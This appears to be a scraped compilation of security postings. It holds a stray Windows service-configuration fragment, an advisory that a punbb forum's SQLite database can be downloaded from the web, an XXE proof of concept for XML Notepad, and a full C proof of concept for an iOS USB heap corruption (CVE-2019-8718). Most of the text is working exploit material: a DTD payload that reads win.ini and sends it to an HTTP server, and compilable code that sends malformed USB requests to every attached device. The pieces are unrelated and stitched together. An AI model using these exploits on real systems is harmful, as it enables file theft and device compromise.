        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Alps HID Monitor Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

 From https://j.ludost.net/blog/archives/2019/11/11/minor_security_issue_in_punbb_with_sqlite/index.html

Minor security issue in punbb with SQLite

Georgi Guninski security advisory #76, 2019

Running punbb-master from https://github.com/punbb/punbb
from Thu 07 Nov 2019 11:23:33 AM UTC

Installing on http://host/forum
In install.php set:

database type: SQLite3
database name: database1

Accessing http://host/forum/database1 returns the full raw database,
including hashes and email addresses.

If attacker guesses the name "database1" or brute force from common
database names, this gives her read access of the raw database.

If you consider this a bug, as workaround set database to something
hard to guess.

Other forum software explicitly want the SQLite database to
be non-accessible from the web.

-- 
CV:    https://j.ludost.net/resumegg.pdf
site:  http://www.guninski.com
blog:  https://j.ludost.net/blog

# Exploit Title: XML Notepad 2.8.0.4 - XML External Entity Injection
# Date: 2019-11-11
# Exploit Author: 8-Team / daejinoh
# Vendor Homepage:  https://www.microsoft.com/  
# Software Link:  https://github.com/microsoft/XmlNotepad  
# Version: XML Notepad 2.8.0.4
# Tested on: Windows 10 Pro
# CVE : N/A

# Step
1) File -> Open -> *.xml

# Exploit Code

1) Server(python 3.7) : python -m http.server
2) Poc.xml : 
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

3) payload.dtd
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;

  --------------------------------------------------------------------------------

# Exploit Title: iOS IOUSBDeviceFamily 12.4.1 - 'IOInterruptEventSource' Heap Corruption (PoC)
# Date: 2019-10-29
# Exploit Author: Sem Voigtlander, Joshua Hill and Raz Mashat
# Vendor Homepage: https://apple.com/
# Software Link: https://support.apple.com/en-hk/HT210606
# Version: iOS 13
# Tested on: iOS 12.4.1
# CVE : N/A

# A vulnerable implementation of IOInterruptEventSource on a workloop exists in IOUSBDeviceFamily.
# The code can be triggered by a local attacker by sending a malicious USB control request to device.
# It seems the faulting address register is corrupted as result of a heap corruption vulnerability.
# However, on earlier iOS versions (tested on 12.0.1) we were able to trigger a use after free in reserved->statistics relating to the same vulnerable code too.
# This bug was found through statically analyzing xnu from public source and optimized USB fuzzing.
# A proof of concept written in C for macOS is attached, for other platforms python and c code using libusb exists on GitHub (https://github.com/userlandkernel/USBusted)

iousbusted.c

/* 
  Pure IOKit implementation of CVE-2019-8718 
  Written by Sem Voigtländer.
  Compile: clang iousbusted.c -o iousbusted -framework IOKit -framework CoreFoundation
  Tip: You can also use this for projects like checkm8 autopwn etc.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <mach/mach.h>
#include <IOKit/usb/IOUSBLib.h>
#include <IOKit/IOCFPlugIn.h>
#include <CoreFoundation/CoreFoundation.h>

/* Faster comparissions for 64-bit integers than != and == */
#define FCOMP(P1,P2) !(P1 ^ P2)

const char *defaultMsg = "HELLO WORLD";

/* Method for sending an USB control message to a target device */
static int send_usb_msg(IOUSBDeviceInterface** dev, int type, int reqno, int val, int idx,  const char *msg)
{

    if(!dev){
        printf("No device handle given.\n");
        return KERN_FAILURE;
    }

    if(!msg)
        msg = defaultMsg;

    IOUSBDevRequest req;
    req.bmRequestType = type;
    req.bRequest = reqno;
    req.wValue = val;
    req.wIndex = idx;
    req.wLength = strlen(msg);
    req.pData =  msg;
    req.wLenDone = 0;
    IOReturn rc = KERN_SUCCESS;

    rc = (*dev)->DeviceRequest(dev, &req);

    if(rc != KERN_SUCCESS)
    {
        return rc;
    }

    return KERN_SUCCESS;
}

static int send_usbusted_pwn_msg(IOUSBDeviceInterface** dev, const char *msg)
{

    if(!dev){
        printf("No device handle given.\n");
        return KERN_FAILURE;
    }

    kern_return_t rc = send_usb_msg(dev, 0|0x80, 0x6, 0x30c, 0x409, msg);

    if(rc != kIOReturnSuccess)
    {
        return rc;
    }

    return KERN_SUCCESS;
}

/* Print information from an IOKit USB device */
static int print_usb_device(io_service_t device){

    kern_return_t err = KERN_SUCCESS;

    CFNumberRef vid = 0;
    CFNumberRef pid = 0;
    CFNumberRef locationID = 0;

    CFMutableDictionaryRef p = NULL;
    err = IORegistryEntryCreateCFProperties(device, &p, NULL, 0);

    if(err != KERN_SUCCESS || !p)
        return err;

    if(!CFDictionaryGetValueIfPresent(p, CFSTR("idVendor"), &vid))
        return KERN_FAILURE;

    if(!CFDictionaryGetValueIfPresent(p, CFSTR("idProduct"), &pid))
        return KERN_FAILURE;

    CFDictionaryGetValueIfPresent(p, CFSTR("locationID"), &locationID);

    CFNumberGetValue(vid, kCFNumberSInt32Type, &vid);
    CFNumberGetValue(pid, kCFNumberSInt32Type, &pid);  // <-- yes I know this is dirty, I was tired.

    if(locationID)
        CFNumberGetValue(locationID, kCFNumberSInt32Type, &locationID);

    printf("Got device %#x @ %#x (%#x:%#x)\n", device, locationID, vid, pid);
    return err;
}

/* Get a handle for sending to a device */
static int get_usbdevice_handle(io_service_t device, IOUSBDeviceInterface* dev){

    kern_return_t err = KERN_SUCCESS;
    SInt32 score;
    IOCFPlugInInterface** plugInInterface = NULL;

    err = IOCreatePlugInInterfaceForService(device,
                                            kIOUSBDeviceUserClientTypeID,
                                            kIOCFPlugInInterfaceID,
&plugInInterface, &score);

    if (err != KERN_SUCCESS || plugInInterface == NULL)
        return err;

    err = (*plugInInterface)->QueryInterface(plugInInterface, CFUUIDGetUUIDBytes(kIOUSBDeviceInterfaceID), (LPVOID*)dev);

    if(err != kIOReturnSuccess)
        return err;

    // Now done with the plugin interface.
    (*plugInInterface)->Release(plugInInterface);
    //plugInInterface = NULL;

    if(!dev)
        return KERN_FAILURE;

    return err;
}

/* Iterate over all USB devices */
static int iterate_usb_devices(const char *msg){
    CFMutableDictionaryRef matchingDict;
    io_iterator_t iter;
    kern_return_t kr;
    io_service_t device;

    /* set up a matching dictionary for the class */
    matchingDict = IOServiceMatching(kIOUSBDeviceClassName);
    if (matchingDict == NULL)
    {
        return -1; // fail
    }

    /* Now we have a dictionary, get an iterator.*/
    kr = IOServiceGetMatchingServices(kIOMasterPortDefault, matchingDict, &iter);
    if (kr != KERN_SUCCESS)
    {
        return -1;
    }

    /* iterate */
    while ((device = IOIteratorNext(iter)))
    {
        /* do something with device, eg. check properties */
        kr = print_usb_device(device);

        if(kr != KERN_SUCCESS){
            printf("Skipping device as it has no vid / pid.\n");
            continue;
        }

        IOUSBDeviceInterface **dev = 0;
        kr = get_usbdevice_handle(device, &dev);

        if(kr != KERN_SUCCESS){
            printf("Skipping device as no handle for it could be retrieved.\n");
            continue;
        }

        kr = send_usbusted_pwn_msg(dev, msg);
        printf("RET: %s\n\n", mach_error_string(kr));

        /* And free the reference taken before continuing to the next item */
        IOObjectRelease(device);
    }

   /* Done, release the iterator */
   IOObjectRelease(iter);
   return 0;
}

int main(int argc, char *argv[]){
    char payload[108];
    memset(&payload, 'A', 108);
  int err = iterate_usb_devices(payload);
  return err;
}